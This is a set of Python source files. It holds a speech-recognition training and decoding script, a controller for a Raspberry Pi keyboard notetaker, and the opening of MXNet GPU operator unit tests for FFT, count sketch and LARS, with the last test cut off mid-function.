if not os.path.exists(out_folder):
os.makedirs(out_folder+'/exp_files')
# Log file path
log_file=config['exp']['out_folder']+'/log.log'
# Read, parse, and check the config file
cfg_file_proto=config['cfg_proto']['cfg_proto']
[config,name_data,name_arch]=check_cfg(cfg_file,config,cfg_file_proto)
# Read cfg file options
is_production=strtobool(config['exp']['production'])
cfg_file_proto_chunk=config['cfg_proto']['cfg_proto_chunk']
cmd=config['exp']['cmd']
N_ep=int(config['exp']['N_epochs_tr'])
N_ep_str_format='0'+str(max(math.ceil(np.log10(N_ep)),1))+'d'
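# e.g. with N_epochs_tr = 24: ceil(log10(24)) = 2, so N_ep_str_format = '02d' and epochs are
# rendered as 00 ... 23 in file names and log lines.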
tr_data_lst=config['data_use']['train_with'].split(',')
valid_data_lst=config['data_use']['valid_with'].split(',')
forward_data_lst=config['data_use']['forward_with'].split(',')
max_seq_length_train=config['batches']['max_seq_length_train']
forward_save_files=list(map(strtobool,config['forward']['save_out_file'].split(',')))
print("- Reading config file......OK!")
# Copy the global cfg file into the output folder
cfg_file=out_folder+'/conf.cfg'
with open(cfg_file, 'w') as configfile:
config.write(configfile)
# Load the run_nn function from the core library
# run_nn is a function that processes a single chunk of data
run_nn_script=config['exp']['run_nn_script'].split('.py')[0]
module = importlib.import_module('core')
run_nn=getattr(module, run_nn_script)
# Splitting data into chunks (see out_folder/additional_files)
create_lists(config)
# Writing the config files
create_configs(config)
print("- Chunk creation......OK!\n")
# create res_file
res_file_path=out_folder+'/res.res'
res_file = open(res_file_path, "w")
res_file.close()
# Learning rates and architecture-specific optimization parameters
arch_lst=get_all_archs(config)
lr={}
auto_lr_annealing={}
improvement_threshold={}
halving_factor={}
pt_files={}
for arch in arch_lst:
lr[arch]=expand_str_ep(config[arch]['arch_lr'],'float',N_ep,'|','*')
if len(config[arch]['arch_lr'].split('|'))>1:
auto_lr_annealing[arch]=False
else:
auto_lr_annealing[arch]=True
improvement_threshold[arch]=float(config[arch]['arch_improvement_threshold'])
halving_factor[arch]=float(config[arch]['arch_halving_factor'])
pt_files[arch]=config[arch]['arch_pretrain_file']
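# Hedged illustration of the learning-rate schedule syntax (assuming expand_str_ep expands
# 'value*count' segments joined by '|'): arch_lr = 0.08 keeps automatic annealing enabled,
# while something like arch_lr = 0.08*10|0.04*14 would pin the schedule explicitly and,
# because it contains '|', disable auto_lr_annealing for that architecture.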
# If production, skip training and forward directly from last saved models
if is_production:
ep = N_ep-1
N_ep = 0
model_files = {}
for arch in pt_files.keys():
model_files[arch] = out_folder+'/exp_files/final_'+arch+'.pkl'
op_counter=1 # used to detect the next configuration file from list_chunks.txt
# Reading the ordered list of config files to process
cfg_file_list = [line.rstrip('\n') for line in open(out_folder+'/exp_files/list_chunks.txt')]
cfg_file_list.append(cfg_file_list[-1])
# A variable that tells if the current chunk is the first one that is being processed:
processed_first=True
data_name=[]
data_set=[]
data_end_index=[]
fea_dict=[]
lab_dict=[]
arch_dict=[]
# --------TRAINING LOOP--------#
for ep in range(N_ep):
tr_loss_tot=0
tr_error_tot=0
tr_time_tot=0
val_time_tot=0
print('------------------------------ Epoch %s / %s ------------------------------'%(format(ep, N_ep_str_format),format(N_ep-1, N_ep_str_format)))
for tr_data in tr_data_lst:
# Compute the total number of chunks for each training epoch
N_ck_tr=compute_n_chunks(out_folder,tr_data,ep,N_ep_str_format,'train')
N_ck_str_format='0'+str(max(math.ceil(np.log10(N_ck_tr)),1))+'d'
# ***Epoch training***
for ck in range(N_ck_tr):
# paths of the output files (info,model,chunk_specific cfg file)
info_file=out_folder+'/exp_files/train_'+tr_data+'_ep'+format(ep, N_ep_str_format)+'_ck'+format(ck, N_ck_str_format)+'.info'
if ep+ck==0:
model_files_past={}
else:
model_files_past=model_files
model_files={}
for arch in pt_files.keys():
model_files[arch]=info_file.replace('.info','_'+arch+'.pkl')
config_chunk_file=out_folder+'/exp_files/train_'+tr_data+'_ep'+format(ep, N_ep_str_format)+'_ck'+format(ck, N_ck_str_format)+'.cfg'
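            # e.g. (hypothetical out_folder and dataset name): exp/TIMIT_MLP/exp_files/
            # train_TIMIT_tr_ep003_ck02.info and the matching ..._ck02.cfg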
# update learning rate in the cfg file (if needed)
change_lr_cfg(config_chunk_file,lr,ep)
# if this chunk has not already been processed, do training...
if not(os.path.exists(info_file)):
print('Training %s chunk = %i / %i' %(tr_data,ck+1, N_ck_tr))
# getting the next chunk
next_config_file=cfg_file_list[op_counter]
# run chunk processing
[data_name,data_set,data_end_index,fea_dict,lab_dict,arch_dict]=run_nn(data_name,data_set,data_end_index,fea_dict,lab_dict,arch_dict,config_chunk_file,processed_first,next_config_file)
# update the first_processed variable
processed_first=False
if not(os.path.exists(info_file)):
sys.stderr.write("ERROR: training epoch %i, chunk %i not done! File %s does not exist.\nSee %s \n" % (ep,ck,info_file,log_file))
sys.exit(0)
# update the operation counter
op_counter+=1
            # update pt_file (used to initialize the DNN for the next chunk)
for pt_arch in pt_files.keys():
pt_files[pt_arch]=out_folder+'/exp_files/train_'+tr_data+'_ep'+format(ep, N_ep_str_format)+'_ck'+format(ck, N_ck_str_format)+'_'+pt_arch+'.pkl'
# remove previous pkl files
if len(model_files_past.keys())>0:
for pt_arch in pt_files.keys():
if os.path.exists(model_files_past[pt_arch]):
os.remove(model_files_past[pt_arch])
if do_validation_after_chunk(ck, N_ck_tr, config):
if not _is_first_validation(ck, N_ck_tr, config):
valid_peformance_dict_prev = valid_peformance_dict
valid_peformance_dict = {}
for valid_data in valid_data_lst:
N_ck_valid = compute_n_chunks(out_folder, valid_data, ep, N_ep_str_format, 'valid')
N_ck_str_format_val = '0' + str(max(math.ceil(np.log10(N_ck_valid)), 1)) + 'd'
for ck_val in range(N_ck_valid):
info_file = get_val_info_file_path(out_folder, valid_data, ep, ck, ck_val, N_ep_str_format, N_ck_str_format, N_ck_str_format_val)
config_chunk_file = get_val_cfg_file_path(out_folder, valid_data, ep, ck, ck_val, N_ep_str_format, N_ck_str_format, N_ck_str_format_val)
if not(os.path.exists(info_file)):
print('Validating %s chunk = %i / %i' %(valid_data, ck_val+1, N_ck_valid))
next_config_file = cfg_file_list[op_counter]
data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict = run_nn(data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict, config_chunk_file, processed_first, next_config_file)
processed_first = False
if not(os.path.exists(info_file)):
sys.stderr.write("ERROR: validation on epoch %i, chunk %i, valid chunk %i of dataset %s not done! File %s does not exist.\nSee %s \n" % (ep, ck, ck_val, valid_data, info_file, log_file))
sys.exit(0)
op_counter+=1
valid_info_lst = sorted(glob.glob(get_val_info_file_path(out_folder, valid_data, ep, ck, None, N_ep_str_format, N_ck_str_format, N_ck_str_format_val)))
valid_loss, valid_error, valid_time = compute_avg_performance(valid_info_lst)
valid_peformance_dict[valid_data] = [valid_loss,valid_error,valid_time]
val_time_tot += valid_time
if not _is_first_validation(ck, N_ck_tr, config):
err_valid_mean = np.mean(np.asarray(list(valid_peformance_dict.values()))[:,1])
err_valid_mean_prev = np.mean(np.asarray(list(valid_peformance_dict_prev.values()))[:,1])
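# Learning-rate annealing: if the relative improvement of the mean validation error
# falls below improvement_threshold for an architecture, its learning rate is scaled by
# halving_factor for all remaining epochs.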
for lr_arch in lr.keys():
if ep < N_ep-1 and auto_lr_annealing[lr_arch]:
if ((err_valid_mean_prev-err_valid_mean)/err_valid_mean)<improvement_threshold[lr_arch]:
new_lr_value = float(lr[lr_arch][ep])*halving_factor[lr_arch]
for i in range(ep + 1, N_ep):
lr[lr_arch][i] = str(new_lr_value)
# Training Loss and Error
tr_info_lst = sorted(glob.glob(out_folder+'/exp_files/train_'+tr_data+'_ep'+format(ep, N_ep_str_format)+'*.info'))
[tr_loss,tr_error,tr_time] = compute_avg_performance(tr_info_lst)
tr_loss_tot=tr_loss_tot+tr_loss
tr_error_tot=tr_error_tot+tr_error
tr_time_tot=tr_time_tot+tr_time
tot_time=tr_time + val_time_tot
# Print results in both res_file and stdout
dump_epoch_results(res_file_path, ep, tr_data_lst, tr_loss_tot, tr_error_tot, tot_time, valid_data_lst, valid_peformance_dict, lr, N_ep)
# Training has ended, copy the last .pkl to final_arch.pkl for production
for pt_arch in pt_files.keys():
if os.path.exists(model_files[pt_arch]) and not os.path.exists(out_folder+'/exp_files/final_'+pt_arch+'.pkl'):
copyfile(model_files[pt_arch], out_folder+'/exp_files/final_'+pt_arch+'.pkl')
# --------FORWARD--------#
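# The forward pass writes the network outputs of each chunk to .ark files that the
# decoding step below consumes.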
for forward_data in forward_data_lst:
# Compute the number of chunks
N_ck_forward=compute_n_chunks(out_folder,forward_data,ep,N_ep_str_format,'forward')
N_ck_str_format='0'+str(max(math.ceil(np.log10(N_ck_forward)),1))+'d'
processes = list()
info_files = list()
for ck in range(N_ck_forward):
if not is_production:
print('Testing %s chunk = %i / %i' %(forward_data,ck+1, N_ck_forward))
else:
print('Forwarding %s chunk = %i / %i' %(forward_data,ck+1, N_ck_forward))
# output file
info_file=out_folder+'/exp_files/forward_'+forward_data+'_ep'+format(ep, N_ep_str_format)+'_ck'+format(ck, N_ck_str_format)+'.info'
config_chunk_file=out_folder+'/exp_files/forward_'+forward_data+'_ep'+format(ep, N_ep_str_format)+'_ck'+format(ck, N_ck_str_format)+'.cfg'
# Do forward if the chunk was not already processed
if not(os.path.exists(info_file)):
# Doing forward
# getting the next chunk
next_config_file=cfg_file_list[op_counter]
# run chunk processing
if _run_forwarding_in_subprocesses(config):
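# Subprocess mode: the chunk is first read into a shared list and converted to torch
# tensors in the parent, then run_nn is dispatched to a separate process. At most
# _max_nr_of_parallel_forwarding_processes processes are kept alive at once; the oldest
# one is joined before a new one is started.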
shared_list = list()
output_folder = config['exp']['out_folder']
save_gpumem = strtobool(config['exp']['save_gpumem'])
use_cuda=strtobool(config['exp']['use_cuda'])
p = read_next_chunk_into_shared_list_with_subprocess(read_lab_fea, shared_list, config_chunk_file, is_production, output_folder, wait_for_process=True)
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set_dict = extract_data_from_shared_list(shared_list)
data_set_inp, data_set_ref = convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda)
data_set = {'input': data_set_inp, 'ref': data_set_ref}
data_end_index = {'fea': data_end_index_fea,'lab': data_end_index_lab}
p = multiprocessing.Process(target=run_nn, kwargs={'data_name': data_name, 'data_set': data_set, 'data_end_index': data_end_index, 'fea_dict': fea_dict, 'lab_dict': lab_dict, 'arch_dict': arch_dict, 'cfg_file': config_chunk_file, 'processed_first': False, 'next_config_file': None})
processes.append(p)
if _max_nr_of_parallel_forwarding_processes(config) != -1 and len(processes) > _max_nr_of_parallel_forwarding_processes(config):
processes[0].join()
del processes[0]
p.start()
else:
[data_name,data_set,data_end_index,fea_dict,lab_dict,arch_dict]=run_nn(data_name,data_set,data_end_index,fea_dict,lab_dict,arch_dict,config_chunk_file,processed_first,next_config_file)
processed_first=False
if not(os.path.exists(info_file)):
sys.stderr.write("ERROR: forward chunk %i of dataset %s not done! File %s does not exist.\nSee %s \n" % (ck,forward_data,info_file,log_file))
sys.exit(1)
info_files.append(info_file)
# update the operation counter
op_counter+=1
if _run_forwarding_in_subprocesses(config):
for process in processes:
process.join()
for info_file in info_files:
if not(os.path.exists(info_file)):
sys.stderr.write("ERROR: File %s does not exist. Forwarding did not suceed.\nSee %s \n" % (info_file,log_file))
sys.exit(1)
# --------DECODING--------#
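# For every forward output flagged in require_decoding, build a dedicated decoding config
# (graph, data and alignment directories are extracted from the dataset's lab section),
# run the external decoding script on the dumped .ark files, and append the resulting
# WER summary to the res file.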
dec_lst=glob.glob( out_folder+'/exp_files/*_to_decode.ark')
forward_data_lst=config['data_use']['forward_with'].split(',')
forward_outs=config['forward']['forward_out'].split(',')
forward_dec_outs=list(map(strtobool,config['forward']['require_decoding'].split(',')))
for data in forward_data_lst:
for k in range(len(forward_outs)):
if forward_dec_outs[k]:
print('Decoding %s output %s' %(data,forward_outs[k]))
info_file=out_folder+'/exp_files/decoding_'+data+'_'+forward_outs[k]+'.info'
# create decode config file
config_dec_file=out_folder+'/decoding_'+data+'_'+forward_outs[k]+'.conf'
config_dec = configparser.ConfigParser()
config_dec.add_section('decoding')
for dec_key in config['decoding'].keys():
config_dec.set('decoding',dec_key,config['decoding'][dec_key])
# add graph_dir, datadir, alidir
lab_field=config[cfg_item2sec(config,'data_name',data)]['lab']
# Production case, we don't have labels
if not is_production:
pattern='lab_folder=(.*)\nlab_opts=(.*)\nlab_count_file=(.*)\nlab_data_folder=(.*)\nlab_graph=(.*)'
alidir=re.findall(pattern,lab_field)[0][0]
config_dec.set('decoding','alidir',os.path.abspath(alidir))
datadir=re.findall(pattern,lab_field)[0][3]
config_dec.set('decoding','data',os.path.abspath(datadir))
graphdir=re.findall(pattern,lab_field)[0][4]
config_dec.set('decoding','graphdir',os.path.abspath(graphdir))
else:
pattern='lab_data_folder=(.*)\nlab_graph=(.*)'
datadir=re.findall(pattern,lab_field)[0][0]
config_dec.set('decoding','data',os.path.abspath(datadir))
graphdir=re.findall(pattern,lab_field)[0][1]
config_dec.set('decoding','graphdir',os.path.abspath(graphdir))
# The ali dir is assumed to be exp/model/, i.e., one level above graphdir
alidir = graphdir.split('/')[0:len(graphdir.split('/'))-1]
alidir = "/".join(alidir)
config_dec.set('decoding','alidir',os.path.abspath(alidir))
with open(config_dec_file, 'w') as configfile:
config_dec.write(configfile)
out_folder=os.path.abspath(out_folder)
files_dec=out_folder+'/exp_files/forward_'+data+'_ep*_ck*_'+forward_outs[k]+'_to_decode.ark'
out_dec_folder=out_folder+'/decode_'+data+'_'+forward_outs[k]
if not(os.path.exists(info_file)):
# Run the decoder
cmd_decode=cmd+config['decoding']['decoding_script_folder'] +'/'+ config['decoding']['decoding_script']+ ' '+os.path.abspath(config_dec_file)+' '+ out_dec_folder + ' \"'+ files_dec + '\"'
run_shell(cmd_decode,log_file)
# remove ark files if needed
if not forward_save_files[k]:
list_rem=glob.glob(files_dec)
for rem_ark in list_rem:
os.remove(rem_ark)
# Print WER results and write info file
cmd_res='./check_res_dec.sh '+out_dec_folder
wers=run_shell(cmd_res,log_file).decode('utf-8')
res_file = open(res_file_path, "a")
res_file.write('%s\n'%wers)
res_file.close()
print(wers)
# Saving Loss and Err as .txt and plotting curves
if not is_production:
create_curves(out_folder, N_ep, valid_data_lst)
|
Controller.py
|
from Keytracker import Keytracker
from Synchronizer import Synchronizer
from threading import Thread
from collections import deque
# REPLACE THIS WITH YOUR WORKING DIRECTORY FOR YOUR PROJECT
WORKING_DIRECTORY = "/home/pi/Projects/Headless-Keyboard-Notetaker"
class Controller:
def __init__(self):
self.__keytracker = Keytracker(self)
self.__synchronizer = Synchronizer()
self.__filename_threads = deque()
def start(self):
self.__synchronizer.start()
self.__keytracker.start()
self.__join_all_threads()
def alert_new_file(self, filename):
self.__drop_dead_threads()
t = Thread(target = self.__synchronizer.alert_new_file, args = (filename,))
t.start()
self.__filename_threads.append(t)
# Join any finished filename threads so they can be garbage collected
def __drop_dead_threads(self):
for i in range(len(self.__filename_threads)):
t = self.__filename_threads.pop()
if t.is_alive():
self.__filename_threads.appendleft(t)
else:
t.join()
def __join_all_threads(self):
self.__synchronizer.close()
self.__synchronizer.join()
while len(self.__filename_threads) > 0:
self.__filename_threads.pop().join()
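# Minimal usage sketch (an assumption, not part of the original project): start() blocks
# in the Keytracker loop and joins the synchronizer and any filename threads on shutdown.
if __name__ == "__main__":
    Controller().start()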
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import mxnet as mx
import numpy as np
import unittest
from nose.tools import assert_raises
import scipy.sparse as sps
import mxnet.ndarray.sparse as mxsps
import itertools
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose
from mxnet.test_utils import check_symbolic_forward, check_symbolic_backward, discard_stderr
from mxnet.test_utils import default_context, rand_shape_2d, rand_ndarray, same, environment
from mxnet.base import MXNetError
from mxnet import autograd
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied
from common import run_in_spawned_process
from test_operator import *
from test_numpy_ndarray import *
from test_numpy_op import *
from test_numpy_interoperability import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
#from test_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_gluon_gpu import _test_bulking
from test_contrib_operator import test_multibox_target_op
from test_tvm_op import *
from test_contrib_optimizer import test_adamw
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
del test_custom_op_fork #noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
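# Reference (naive) CountSketch: for every sample, accumulate s[i] * x[i] into output
# bucket h[i]; the operator's forward output is checked against this below.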
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
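# contrib.ifft stores complex inputs as interleaved (real, imag) pairs along the last
# axis; rebuild a numpy complex array from that layout so the result can be compared
# against np.fft.ifft (up to the 1/N scaling applied in the assertions below).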
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
@with_seed()
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
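# contrib.fft emits (real, imag) pairs interleaved along the last axis; the loops below
# re-order numpy's complex FFT output into that layout before comparing.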
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
def _make_ndarrays(input_list, ctx=mx.gpu(0)):
return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list]
def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2):
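# Compare the fused multi_sum_sq operator against a per-array float32 reference, and run
# it twice to check that the result is deterministic.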
values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes]
mx_vals = _make_ndarrays(values_arr, ctx=ctx)
sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
# checks that operator is deterministic
assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy())
ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1)
@with_seed()
def test_multi_sum_sq():
min_nparam = 100
max_nparam = 120
min_dim = 50000
max_dim = 100000
max_ndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.gpu(0)]:
for dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)]
low_tol = ctx == mx.cpu(0) and ('float16' in [dtype])
tol1 = 1e-3 if low_tol else 1e-5
tol2 = 1e-6 if low_tol else 1e-7
check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2)
def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2):
weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes]
lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100.
wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000.
eta = (np.random.rand() + 0.1)
eps = (np.random.rand() + 0.1) / 10000.
mx_w = _make_ndarrays(weights_arr, ctx=ctx)
mx_g = _make_ndarrays(grads_arr, ctx=ctx)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx)
w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes))
g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes))
ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr],
dtype='float32', ctx=ctx)
ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
rescale_grad = (np.random.rand() + 0.5) * 100.
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps,
rescale_grad=rescale_grad)
ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq)
ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad)
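# Reference LARS rule: new_lr_i = lr_i * eta * ||w_i|| / (||g_i|| + wd_i * ||w_i|| + eps)
# when both norms are positive; otherwise the learning rate is left unchanged.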
ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx)
for i in range(ref_w_l2norm.size):
_w = ref_w_l2norm[i]
_g = ref_g_l2norm[i]
if _w > 0.0 and _g > 0.0:
ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps)
else:
ref_new_lrs[i] = lrs[i]
assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2)
@with_seed()
def test_fast_lars():
min_nparam = 50
max_nparam = 60
maxdim = 10000
maxndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.cpu(0), mx.gpu(0)]:
for w_dtype in dtypes:
for g_dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
lowTol = ctx == mx.cpu(0) and ('float16' in [w_dtype, g_dtype])
tol1 = 1e-3 if lowTol else 1e-5
tol2 = 1e-6 if lowTol else 1e-7
